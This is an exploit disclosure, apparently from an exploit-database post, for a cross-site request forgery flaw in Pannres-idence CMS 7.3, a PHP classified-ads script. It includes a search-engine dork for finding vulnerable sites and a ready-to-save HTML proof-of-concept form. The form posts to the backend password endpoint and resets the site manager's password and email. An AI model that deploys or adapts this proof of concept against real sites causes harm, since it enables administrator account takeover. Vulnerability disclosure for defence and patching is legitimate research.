====================================================================================================================================
| # Title     : Pannres-idence CMS 7.3 CSRF Vulnerability                                                                          |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | 
| # Vendor    : https://codecanyon.net/item/pannresidence-classified-ads-php-script/19960675?s_rank=189                            |  
| # Dork      : "Bylancer, All right reserved"                                                                                     |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] The following html Will modify the password for the site manager, as well as change the e-mail.

[+] save code as poc.html .



<form class="form-horizontal" action="http://127.0.0.1/pannresidencecom/backend/add_newPassword.php" name="form2" id="form2">

                            <fieldset>

                                <div class="form-group">
                                    <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>
                                    <div class="col-md-10" id="thumbsite">
                                        <input name="password" id="password" class="form-control" placeholder="Your new password." type="password">
                                    </div>
                                </div>

                                <div class="form-group">
                                    <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>
                                    <div class="col-md-10" id="thumbsite">
                                        <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">

                                    </div>
                                </div>
                                
								<div class="form-group">
                                    <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>
                                    <div class="col-md-10" id="thumbsite">
                                        <input name="newEmail" value="" class="form-control" type="email">

                                    </div>
                                </div>
                                
                            </fieldset>

                            <div class="">
                                <div class="row">
                                    <div class="col-md-12">
                                        <button class="btn btn-default" type="clear">
                                            Cancel
                                        </button>

                                        <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">
                                            <i class="fa fa-save"></i>
                                            Submit
                                        </button>
                                    </div>
                                </div>
                            </div>

                        </form>

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================